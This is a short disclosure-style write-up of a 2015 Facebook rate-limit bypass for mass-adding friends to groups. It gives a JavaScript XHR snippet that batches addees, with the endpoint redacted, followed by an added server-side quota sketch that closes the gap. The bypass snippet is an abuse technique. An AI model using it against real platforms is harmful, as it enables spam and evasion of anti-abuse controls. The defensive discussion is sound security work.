Facebook Exploit July 2015: Bypass Protection/Block System

Bypass Facebook Protection/Block System
Facebook's protection system is designed to prevent spamming and scamming activities. However, certain limitations can be bypassed, allowing users to exceed restrictions on actions such as adding friends to groups or sharing content.
Examples:
- Group Member Limits: Users are typically blocked after adding 600–1200 friends to a group using scripts or tools.
- Sharing Limits: Users are restricted to sharing content to a maximum of 7 groups before being blocked.
Through research, it was discovered that subdomains (*.facebook.com) lack proper validation controls, enabling bypass of these restrictions.
Bypassing Group Member Addition Limits:
Create an XHR request to add users to a group using a specific endpoint. The exact URL and parameters are sensitive and have been redacted for security purposes.
Example Code:
    var uid = "778218884"; // Example user ID, loop for all friends
    var Page = new XMLHttpRequest();
    var PageURL = "[Redacted for security purposes]";
    // Form-encoded body: session token, charset probe, one addees[<uid>]=<uid> pair, target group
    var PageParams = "fb_dtsg=AQHR-09syXqn&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&addees%5B" + uid + "%5D=" + uid + "&group_id=824691297597477";
    Page.open("POST", PageURL, true);
    Page.onreadystatechange = function() {
      if (Page.readyState == 4 && Page.status == 200) {
        Page.close; // no-op: XMLHttpRequest has no close method
      }
    };
    Page.send(PageParams);
This code allows adding 8 or more friends per request, enabling faster group additions beyond the standard limits.
- Reported: July 2015
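
A server-side mitigation for the two gaps described above (limits that do not hold across *.facebook.com hosts, and several addees carried in one request), as an added example that is not from the original report and is not Facebook's code. The class name ActionQuota, the request shape, the limit values and the example.test hostnames are assumptions made for illustration.

```javascript
// Added defensive sketch (not Facebook's code). Quota is keyed on the
// authenticated account and action, never on the Host header, and each
// request is charged per addee rather than per request.
class ActionQuota {
  constructor(limit, windowMs) {
    this.limit = limit;       // max units per account per window
    this.windowMs = windowMs;
    this.events = new Map();  // "account|action" -> [{ t, units }]
  }

  // Count distinct addees[<uid>]=<uid> pairs in a form-encoded body.
  static countAddees(body) {
    const ids = new Set();
    for (const [key, value] of new URLSearchParams(body)) {
      if (/^addees\[\d+\]$/.test(key)) ids.add(value);
    }
    return ids.size;
  }

  // req: { accountId, host, action, body, now } (hypothetical shape).
  // req.host is deliberately unused: every subdomain shares one budget.
  check(req) {
    const key = `${req.accountId}|${req.action}`;
    const units = Math.max(1, ActionQuota.countAddees(req.body));
    const recent = (this.events.get(key) || [])
      .filter((e) => req.now - e.t < this.windowMs);
    const used = recent.reduce((sum, e) => sum + e.units, 0);
    const allowed = used + units <= this.limit;
    if (allowed) recent.push({ t: req.now, units });
    this.events.set(key, recent);
    return { allowed, used: allowed ? used + units : used };
  }
}

// Constructed sample traffic: one account, three hostnames, batched addees.
function demo() {
  const quota = new ActionQuota(10, 60000);
  const body = (ids) => ids.map((i) => `addees%5B${i}%5D=${i}`).join("&");
  const mk = (host, ids, now) =>
    ({ accountId: "acct-1", host, action: "group_add", body: body(ids), now });
  return [
    quota.check(mk("www.example.test", [1, 2, 3, 4], 0)),
    quota.check(mk("m.example.test", [5, 6, 7, 8], 1000)),
    quota.check(mk("beta.example.test", [9, 10, 11], 2000)), // over budget
    quota.check(mk("www.example.test", [9, 10], 3000)),
  ];
}
```

The third request is refused even though it arrives on a hostname not used before, because the budget follows the account and counts every addee.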